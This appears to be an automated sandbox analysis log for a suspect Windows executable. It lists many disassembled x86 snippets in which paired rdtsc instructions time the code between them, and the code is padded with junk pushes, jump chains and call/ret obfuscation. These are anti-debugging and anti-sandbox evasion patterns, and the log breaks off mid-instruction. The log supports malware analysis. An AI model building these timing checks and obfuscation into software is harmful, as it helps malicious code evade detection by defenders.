Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9146B4 second address: 9146EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 js 00007FB7D509B846h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB7D509B854h 0x00000016 jmp 00007FB7D509B852h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9146EB second address: 9146EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9146EF second address: 9146F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914C75 second address: 914C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914C79 second address: 914C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914C7D second address: 914C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9169E9 second address: 9169ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9169ED second address: 916A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FB7D50A5EE5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 916A0B second address: 916A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B84Bh 0x00000008 jbe 00007FB7D509B846h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91A89B second address: 91A8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91A8A9 second address: 91A8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB7D509B855h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91FC35 second address: 91FC52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91FC52 second address: 91FC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D509B858h 0x0000000b pop edi 0x0000000c push esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91F2E8 second address: 91F2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D50A5ED6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91F2F3 second address: 91F2F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91F55F second address: 91F589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDCh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB7D50A5EE8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922301 second address: 92230B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92230B second address: 92230F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9223C4 second address: 9223CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9223CD second address: 9223E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007FB7D50A5EEFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9223E0 second address: 92240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B851h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FB7D509B84Ch 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92240D second address: 922414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922414 second address: 922446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov si, 3F19h 0x0000000d call 00007FB7D509B849h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB7D509B858h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922446 second address: 92244A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92244A second address: 922450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922450 second address: 92246D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D50A5EE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92246D second address: 9224FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB7D509B851h 0x0000000e push esi 0x0000000f jno 00007FB7D509B846h 0x00000015 pop esi 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c push ebx 0x0000001d jmp 00007FB7D509B858h 0x00000022 pop ebx 0x00000023 pop ebx 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007FB7D509B857h 0x0000002d jmp 00007FB7D509B854h 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FB7D509B859h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922643 second address: 922649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922649 second address: 92264D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92313E second address: 923142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923142 second address: 923146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923146 second address: 92314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92314C second address: 923153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923153 second address: 92317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a sub dword ptr [ebp+122D27A9h], edx 0x00000010 stc 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FB7D50A5EDFh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923557 second address: 923574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B854h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923BB7 second address: 923C1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D50A5EE9h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2760h], edi 0x0000002d sub dword ptr [ebp+122D31F6h], ecx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D2E46h], esi 0x0000003b push 00000000h 0x0000003d or dword ptr [ebp+1245949Dh], edx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C1A second address: 923C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C1F second address: 923C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C51 second address: 926C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924DEA second address: 924DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C57 second address: 926CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B858h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FB7D509B848h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov edi, 7340C3B1h 0x0000002d push 00000000h 0x0000002f sub dword ptr [ebp+122D25C2h], eax 0x00000035 movsx esi, dx 0x00000038 push 00000000h 0x0000003a mov di, ax 0x0000003d xchg eax, ebx 0x0000003e jp 00007FB7D509B850h 0x00000044 push eax 0x00000045 pushad 0x00000046 jl 00007FB7D509B84Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924DEE second address: 924DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924DF2 second address: 924E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FB7D509B84Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928126 second address: 92813F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92955A second address: 929575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928921 second address: 928925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928925 second address: 928945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB7D509B84Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D509B84Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92ED54 second address: 92EDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 movzx ebx, ax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 and di, 7519h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FB7D50A5ED8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 stc 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d jno 00007FB7D50A5ED6h 0x00000053 pop edi 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D008 second address: 92D095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB7D509B852h 0x0000000b jmp 00007FB7D509B854h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 cmc 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007FB7D509B84Ch 0x00000022 js 00007FB7D509B856h 0x00000028 call 00007FB7D509B84Fh 0x0000002d pop ebx 0x0000002e pop ebx 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 jmp 00007FB7D509B850h 0x0000003b mov eax, dword ptr [ebp+122D1249h] 0x00000041 mov ebx, dword ptr [ebp+122D32C6h] 0x00000047 push FFFFFFFFh 0x00000049 clc 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e jo 00007FB7D509B846h 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EDBC second address: 92EDCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EDCB second address: 92EDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EEE7 second address: 92EEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EEEB second address: 92EEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EEF1 second address: 92EF87 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D50A5ED8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 and edi, 5B2CD2D7h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 add dword ptr [ebp+122D27A9h], ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007FB7D50A5ED8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b call 00007FB7D50A5EE1h 0x00000060 cmc 0x00000061 pop edi 0x00000062 mov eax, dword ptr [ebp+122D0D7Dh] 0x00000068 mov edi, dword ptr [ebp+122D27C2h] 0x0000006e push FFFFFFFFh 0x00000070 jmp 00007FB7D50A5EDBh 0x00000075 push eax 0x00000076 push edi 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 930E2E second address: 930EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007FB7D509B852h 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D2BD2h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FB7D509B848h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 pushad 0x00000031 or ebx, dword ptr [ebp+122D3858h] 0x00000037 mov dword ptr [ebp+122D38BEh], ecx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FB7D509B848h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a cld 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007FB7D509B851h 0x00000063 pop eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push edi 0x00000067 pop edi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931D6F second address: 931D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931D73 second address: 931D87 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB7D509B846h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931F1E second address: 931FC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FB7D50A5ED8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov bx, si 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov ebx, dword ptr [ebp+122D2AEEh] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d jne 00007FB7D50A5EDCh 0x00000043 mov eax, dword ptr [ebp+122D0A55h] 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007FB7D50A5ED8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 mov edi, dword ptr [ebp+122D2B6Eh] 0x00000069 push FFFFFFFFh 0x0000006b mov edi, dword ptr [ebp+122D2AFEh] 0x00000071 nop 0x00000072 jmp 00007FB7D50A5EDBh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931FC9 second address: 931FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936521 second address: 93652F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FB7D50A5EDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93652F second address: 93657D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 and edi, 0F847E87h 0x0000000e push 00000000h 0x00000010 xor ebx, dword ptr [ebp+122D2B72h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FB7D509B848h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FB7D509B850h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93657D second address: 936596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93A766 second address: 93A770 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93ACD4 second address: 93AD5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FB7D50A5EE0h 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FB7D50A5ED8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub bl, FFFFFFE2h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FB7D50A5ED8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D2E25h], ebx 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 jmp 00007FB7D50A5EE9h 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93BF16 second address: 93BF24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93BF24 second address: 93BF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 937891 second address: 9378B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB7D509B852h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93673B second address: 936756 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5EDCh 0x00000008 jnp 00007FB7D50A5ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FB7D50A5ED8h 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CEE6 second address: 93CEEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CEEC second address: 93CF8D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB7D50A5EDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jmp 00007FB7D50A5EE6h 0x00000011 pop eax 0x00000012 nop 0x00000013 push edx 0x00000014 movsx edi, cx 0x00000017 pop edi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FB7D50A5ED8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov bx, 3475h 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jl 00007FB7D50A5EF0h 0x0000004a call 00007FB7D50A5EE3h 0x0000004f mov dword ptr [ebp+122D2518h], esi 0x00000055 pop edi 0x00000056 mov bx, si 0x00000059 mov eax, dword ptr [ebp+122D02CDh] 0x0000005f mov ebx, dword ptr [ebp+122D32A1h] 0x00000065 clc 0x00000066 push FFFFFFFFh 0x00000068 sub dword ptr 